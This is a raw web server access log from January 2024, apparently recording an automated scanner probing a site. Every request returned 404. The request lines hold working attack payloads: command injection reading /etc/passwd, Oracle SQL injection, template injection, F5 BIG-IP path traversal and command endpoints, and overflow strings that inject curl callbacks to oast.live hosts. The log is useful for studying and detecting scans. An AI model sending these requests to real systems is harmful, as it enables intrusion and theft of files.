137.220.197.141 - - [21/Jan/2024:23:03:56 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:03:58 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:18 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:20 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:31 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:39 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:45 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:47 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:04:51 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:05:05 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:05:20 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:05:31 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:05:45 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:07:00 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:07:15 +0100] "GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:07:38 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:09:09 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:09:11 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:09:11 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:09:20 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:09:33 +0100] "GET /settings.php HTTP/1.1" 404 952
107.170.249.12 - - [21/Jan/2024:23:09:38 +0100] "GET /actuator/health HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:10:07 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:10:13 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:10:31 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:10:40 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:12:03 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:12:05 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:12:52 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:13:45 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:13:58 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:14:00 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:14:09 +0100] "GET /settings.php HTTP/1.1" 404 952
78.108.177.54 - - [21/Jan/2024:23:14:30 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:23:14:44 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:14:48 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:14:50 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:15:26 +0100] "POST /getcfg.php HTTP/1.1" 404 952
146.19.24.23 - - [21/Jan/2024:23:15:56 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:16:00 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:16:32 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:16:55 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:17:08 +0100] "GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:17:32 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:17:44 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:17:52 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:17:56 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:18:07 +0100] "POST /getcfg.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:18:11 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:18:25 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:18:37 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:18:51 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:20:20 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:20:26 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:20:34 +0100] "GET /settings.php HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:20:57 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:21:21 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:21:29 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:21:31 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:07 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:09 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:11 +0100] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:11 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:13 +0100] "GET /hsqldb%0a HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:15 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:15 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:17 +0100] "POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:19 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:21 +0100] "POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:24 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:38 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:38 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:43 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:55 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:22:59 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:23:09 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:23:32 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:23:34 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:24:02 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:24:30 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:24:59 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:25:01 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:25:23 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:25:25 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:25:50 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:25:52 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:26:33 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:26:45 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:27:09 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:27:33 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:27:45 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsoggdaoyjx91y1jh.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogp7mbh4x9afy46.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:27:47 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogahnh9om33mqi3.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog5aiwen9u75e7h.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:00 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:00 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:02 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:11 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:28 +0100] "GET /admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:30 +0100] "GET /admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:38 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:28:53 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:29:06 +0100] "POST /graphql HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:29:20 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:30:47 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogjxbdmb3oczba4.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogb4rpmmndworsy.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:30:49 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogtkuqdqchpfy9n.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogobsafitasdr7r.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:31:09 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogdntkj64twtg9e.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogmdzgefna6n5j3.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:31:11 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogc9uc84mff8df9.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogm4kmbe11rrcjm.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:31:34 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogyzxd7qhjydahw.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BF%08%B7%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsog6uc1kwfcoj1ah.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:31:37 +0100] "GET /%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogmaooyzqyeowtx.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;%04%D7%7F%BF%18%D8%7F%BF%18%D8%7F%BFd%B8%06%08;%7Bcurl,http://cmm00rc3m87t5g88qsogusj1gdhf3xyd7.oast.live+-H+%27User-Agent:+dPbRMi%27%7D;?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:31:50 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:32:06 +0100] "GET /index.jsp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:32:38 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:33:24 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:33:38 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:33:40 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:35:01 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:35:15 +0100] "POST /upload HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:35:36 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:35:38 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:35:49 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:36:04 +0100] "POST /storfs-asup HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:36:30 +0100] "GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}} HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:23:36:32 +0100] "GET /actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}} HTTP/1.1" 404 952
